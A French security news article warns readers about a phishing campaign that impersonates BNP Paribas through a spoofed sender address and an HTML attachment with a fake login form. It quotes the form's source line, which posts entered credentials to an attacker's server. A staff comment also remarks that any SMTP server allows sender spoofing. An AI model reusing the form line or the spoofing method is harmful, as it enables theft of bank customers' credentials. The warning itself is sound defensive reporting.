Publié par UnderNews Actu

Alerte phishing – Depuis presque 24 heures, les envois de mails s’enchaînent et les escrocs se sont bien débrouillés pour avoir un mail à l’image de la banque BNP Paribas. Prudence !

Les multiples tentatives de hameçonnage de ces dernières heures visant la banque BNP Paribas se sont faites remarquées par un grand nombre d’internautes. En effet, le mail est plutôt bien présenté, aux couleur de la banque et dans un français correct. Il titre « BNP Paribas – Mesure De Sécurité« .

Seul détail, une erreur sur le nom de la banque dans le contenu du mail : le pirate parler de Crédit Mutuel au lieu de BNP Paribas… sans commentaire.

bnp-paribas_phishing-mail-hameconnage

Le mail d’envoi semble correct car il a été falsifié lors de l’envoi : service@bnpparibas.net. Le pirate n’a pas hésité à inventer le « Service CyberBNP » pour signer le mail ! Pas de lien direct dans le contenu du mail, le piège se situe en pièce jointe, dans un fichier HTML à télécharger (certificat_bnp.htm), affichant un formulaire aux couleur de la banque et invitant à saisir ses codes confidentiels :

IP Vanish VPN

certificat_bnp

Tout paraît normal sauf que si l’on regarde la source de la page, on remarque cette ligne, qui envoi les données confidentielles saisies directement au pirate : <form method= »post » name= »logincanalnet » action= »http://bnpparibas.scieron.com:89/lok.php »>.

Au passage, scieron.com s’avère être un service DynDNS permettant rediriger facilement un sous domaine vers un espace Web personnel. Pour une fois, le pirate n’a donc pas utilisé un site Web piraté pour y déposer son kit de phishing.

Related Posts Plugin for WordPress, Blogger...
  • Facebook
  • Twitter
  • Google Buzz
  • MySpace
  • Yahoo Buzz
  • Technorati
  • Netvibes
  • Delicious
  • Digg
  • Windows Live
  • LinkedIn
  • E-Mail

Recherches en relation :

  • logo bnp paribas
  • bnp paribas logo
  • service@bnpparibas net spam ?
  • piratage site bnp
  • bnp paribas logo 2013

Classé dans : Phishing

1 étoile2 étoiles3 étoiles4 étoiles5 étoiles (1 votes, note : 4,00 sur 5)
Loading...Loading...

Mots clés : , , , , , ,

ARTICLE PRECEDENT

ARTICLE SUIVANT


Vos réactions
  1. kevin

    Merci UnderNews :-)

  2. kevin

    bonjour,
    je me demande bien comment ils arrivent à envoyer des tonnes de mails tout en fascifiant le mail d’envoi comme iindique dans l’article? et ça bypass meme les anti spams

    • UnderNews UnderNews

      Bonjour,

      C’est simple, tout d’abord une grosse liste de mails (qualifiés ou pas) puis un serveur SMTP lambda. Tout SMTP peut permettre l’usurpation de mail à l’envoi.

      Ensuite, votre dernière affirmation est fausse, beaucoup de personnes l’ont reçu en spam ;)


Connexion via :




Notifiez-moi des commentaires à venir via e-mail. Vous pouvez aussi vous abonner sans commenter.